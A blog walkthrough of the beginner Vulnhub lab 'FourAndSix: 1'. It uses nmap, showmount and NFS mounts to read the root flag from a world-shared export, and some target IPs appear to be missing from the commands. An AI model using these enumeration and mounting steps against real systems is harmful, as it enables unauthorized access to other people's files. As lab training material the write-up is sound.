FourAndSix: 1 CTF VULNHUB Walkthrough/Writeup

FourAndSix: 1 CTF VULNHUB Walkthrough/Writeup:

Today we will be looking at FourAndSix: 1 CTF Vulnhub Challenge by Fred which was uploaded on It is a entry level, beginner friendly CTF suitable for noobs.

As no description is provided by the author on vulnhub we assume we need to gain root access and capture the flag as most of the case.

You can download this machine by clicking here.

Lets Get Started:

FourAndSix: 1 CTF VULNHUB Walkthrough/Writeup

After getting the IP address of the machine we hit nmap for the available ports and service.

nmap -sV -sC -A -vv -p-
Nmap scan report for fourandsix (
Host is up, received arp-response (0.00081s latency).
Scanned at 2018-07-23 19:38:36 IST for 681s
Not shown: 65531 closed ports
Reason: 65531 resets
22/tcp   open  ssh     syn-ack ttl 64 OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 1c:8a:0e:a7:ae:6a:72:ab:c8:88:db:0b:fc:7d:53:c0 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCxwYsIPtgzrJCCBfDxQaA4eMOcJGfP7ioV4nTzwMGKyCryOrCcsBIk9X++SMbXb2Sxlq+XYhBa9nMT2abfOUAuh3LcW+DB+ndMqSEgI/w2wqCR3vL8wT6+Pig+lflh4aIWDXULRKBjNAf9c1rdJ1tt4SYEsEDJ807HVb5Rg2hulibVgp095/EpTyB2vG6ig9zo4rqt0sPF6oc+yaIxld9GrnUxueAkPqw/qwIGO0TIzkuUnZOCmaRT0BnPv6meQQIvy2GiQM8gU+Fk9AceD6YE9iC08wB3nbo8E8A1DHvOCbhBhW/RW5kQ8VFJxdWxTXquKe74S7sfDeZ/lNGyATI7
|   256 8a:9e:af:85:ef:41:51:54:ee:14:35:9d:78:46:cd:56 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKuhzpuMVn0mCPSETswV/gJYan5nphdhOcpOwOBNkIPb2p7h6reh9a5k2h9KyG5XeAqNW5V3wFTJmEfZCzOAvPM=
|   256 0f:42:83:da:a5:7e:53:9c:a5:21:e4:3f:8a:d8:ad:28 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIG6mHUNP/Xzjw55bhOsx0amSUeEgZifBUpf8y/G4QWR0
111/tcp  open  rpcbind syn-ack ttl 64 2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3         2049/tcp  nfs
|   100003  2,3         2049/udp  nfs
|   100005  1,3          787/tcp  mountd
|_  100005  1,3          858/udp  mountd
787/tcp  open  mountd  syn-ack ttl 64 1-3 (RPC #100005)
2049/tcp open  nfs     syn-ack ttl 64 2-3 (RPC #100003)
MAC Address: 08:00:27:09:69:05 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: OpenBSD 6.X
OS CPE: cpe:/o:openbsd:openbsd:6
OS details: OpenBSD 6.0 - 6.1

Well we can clearly see that the port 2049 is running NFS(Network File System) service and must have an export available to mount :D

Network File System(NFS) allows remote hosts to mount file system over a network. For this NFS server export a directory which can be mounted remotely.

Lets check for the available mounts:
showmount -e
Export list for
/shared (everyone)

So we got our export available and it is shared with everyone in the /shared directory on the server.

Its time to mount it. So create a directory  first for the export to mount and mount it on your system.
mkdir /tmp/CTF
mount -t nfs /tmp/CTF

 we found a image(.img) file in /shared directory of out export. Lets try to mount it and see if we find something interesting.

mkdir usb_stick
mount USB-stick.img usb_stick/
cd usb_stick/
ls -la

but got no luck.

We need to access root directory in order to get the root flag so lets try to mount the root directory if we can.

mkdir root
mount -t nfs /tmp/CTF/root/
cd /tmp/CTF/root
ls -la

And in the root directory mount we have a file names proof.txt
Let us check the content of the text file proof.txt

cat proof.txt

And Voila!! we have our root flag!

1 comment:

Powered by Blogger.